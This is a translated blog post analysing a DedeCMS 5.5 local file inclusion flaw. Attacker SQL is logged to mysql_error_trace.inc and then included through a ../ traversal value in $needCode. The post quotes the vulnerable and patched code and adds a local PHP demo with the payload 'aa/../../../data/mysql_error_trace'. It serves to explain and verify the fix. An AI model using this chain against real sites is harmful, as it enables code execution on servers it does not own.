www.st0p.org
I have been sitting on a few holes for a long time and had been meaning to write up an analysis. I have been busy installing things on Ubuntu lately... never mind.
From time to time friends add me and ask me to teach them how to find holes... It looks like tiring work, and luck accounts for a large part of it... So I do my best to help with the analysis, which also makes learning easier for me.
For the specific EXP, see: http://www.st0p.org/blog/archives/dedecms-5-5-datalistcp-class-php-contains-exp.html
Earlier, DedeCMS wrote failed SQL statements into mysql_error_trace.php, which the gurus later exposed; the file was then renamed to mysql_error_trace.inc...
I did not expect it to get included again this time... It seems that logging SQL errors is not such a good idea...
The principle of this EXP: send a specially constructed request to plus/digg_ajax.php so that our statement is written into mysql_error_trace.inc. Plenty of other files can also get something written into mysql_error_trace.inc in this step, but getting it executed is the hard part. The hole reported this time can only be hit with a bit of luck...
The key code is in
/include/datalistcp.class.php
...
$codefile = (isset($needCode) ? $needCode : $cfg_soft_lang);
// isset() checks whether $needCode was supplied. If it was, $needCode is used; otherwise
// the configured $cfg_soft_lang is used (the extracted page garbles this variable as
// "$pai_soft_lang" / "$yun_soft_lang"; DedeCMS's language setting is $cfg_soft_lang).
// With a forged $needCode of aa/.../../data/mysql_error_trace (as printed on the page; the
// number of ../ segments needed depends on where data/ sits relative to DEDEINC/code/) ...
if(file_exists(DEDEINC.'/code/datalist_'.$codefile.'.inc'))
{
    require_once(DEDEINC.'/code/datalist_'.$codefile.'.inc');
    // The suffix is fixed to .inc, which is exactly the log file's extension.
}
// file_exists() checks that the file is there and, if so, it is required. The ../ segments
// walk out of the code directory into data/, landing on the mysql_error_trace.inc we just
// constructed, and the statement we wrote into mysql_error_trace.inc runs...
// (The separator between 'datalist' and $codefile is garbled on the page; '_' is assumed here.)
...
Depressing. The official site had not finished handling it the previous few times... I just went to the official site, and it has been fixed with a regular expression.
$codefile = (isset($needCode) ? $needCode : $cfg_soft_lang);
$codefile = preg_replace("/[^\w\-]/", "", $codefile);
// Strips every character that is not a word character or '-', so '/' and '.' (and with
// them any ../) can no longer reach the path. The page's extraction dropped the '^', the
// backslash and the empty replacement argument; they are restored here.
if(file_exists(DEDEINC.'/code/datalist_'.$codefile.'.inc'))
{
    require_once(DEDEINC.'/code/datalist_'.$codefile.'.inc');
}
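The following is an added example, not code from the post or from DedeCMS. It rebuilds both the vulnerable include above and the regex-filtered version against a throwaway directory tree, so the traversal and the effect of the fix can be observed locally. Everything the extracted page garbles is assumed here: DEDEINC is <root>/include, the include prefix is datalist_, the suffix is .inc, the poisoned log sits at <root>/data/mysql_error_trace.inc, the default language is gb2312, and the payload aa/../../../data/mysql_error_trace is my own construction. The two .inc files are constructed stand-ins that only return a marker string.

```php
<?php
// Added example (not DedeCMS code). Assumptions: DEDEINC = <root>/include,
// prefix 'datalist_', suffix '.inc', log at <root>/data/mysql_error_trace.inc.

$root = sys_get_temp_dir() . '/dede_lfi_' . uniqid();
mkdir("$root/include/code", 0700, true);
mkdir("$root/data", 0700, true);
define('DEDEINC', $root . '/include');

// Constructed stand-ins. The real log would hold whatever plus/digg_ajax.php wrote;
// here each file just returns a marker so we can tell which one got included.
file_put_contents(DEDEINC . '/code/datalist_gb2312.inc',
    "<?php return 'legitimate datalist_gb2312.inc'; ?>");
file_put_contents("$root/data/mysql_error_trace.inc",
    "<?php return 'poisoned mysql_error_trace.inc'; ?>");

function build_path($codefile)
{
    return DEDEINC . '/code/datalist_' . $codefile . '.inc';
}

// Purely lexical ../ collapsing, to show where the path points regardless of OS.
function lexical_normalize($path)
{
    $out = array();
    foreach (explode('/', $path) as $seg) {
        if ($seg === '' || $seg === '.') { continue; }
        if ($seg === '..') { array_pop($out); continue; }
        $out[] = $seg;
    }
    $prefix = ($path !== '' && $path[0] === '/') ? '/' : '';
    return $prefix . implode('/', $out);
}

// 5.5 behaviour: $needCode flows unfiltered into the path.
function vulnerable_include($needCode, $cfg_soft_lang = 'gb2312')
{
    $codefile = (isset($needCode) ? $needCode : $cfg_soft_lang);
    $path = build_path($codefile);
    if (file_exists($path)) {
        return include $path;
    }
    return null;
}

// Official fix: everything outside [A-Za-z0-9_-] is stripped before the path is built.
function patched_include($needCode, $cfg_soft_lang = 'gb2312')
{
    $codefile = (isset($needCode) ? $needCode : $cfg_soft_lang);
    $codefile = preg_replace("/[^\w\-]/", '', $codefile);
    $path = build_path($codefile);
    if (file_exists($path)) {
        return include $path;
    }
    return null;
}

// Payload (constructed): 'aa' turns 'datalist_aa' into one whole path component,
// then three ../ climb code -> include -> <root>, ending in data/.
$payload = 'aa/../../../data/mysql_error_trace';

printf("default   : %s\n", var_export(vulnerable_include(null), true));
printf("resolves  : %s\n", lexical_normalize(build_path($payload)));
printf("vulnerable: %s\n", var_export(vulnerable_include($payload), true));
printf("filtered  : %s\n", preg_replace("/[^\w\-]/", '', $payload));
printf("patched   : %s\n", var_export(patched_include($payload), true));

// Cleanup of the throwaway tree.
unlink(DEDEINC . '/code/datalist_gb2312.inc');
unlink("$root/data/mysql_error_trace.inc");
rmdir("$root/data");
rmdir(DEDEINC . '/code');
rmdir(DEDEINC);
rmdir($root);
```

Run it with `php lfi_demo.php`. The "resolves" line shows that the unfiltered path collapses to <root>/data/mysql_error_trace.inc. Whether the "vulnerable" line actually includes the poisoned log depends on the platform: PHP on Windows collapses the ../ segments lexically, so the nonexistent datalist_aa component is skipped over and the log is included, while on Linux the kernel's path walk requires datalist_aa to exist as a directory and file_exists() returns false. That platform dependence is part of the "luck" the post mentions. After the filter the payload degenerates to aadatamysql_error_trace, so the patched version looks for datalist_aadatamysql_error_trace.inc and includes nothing.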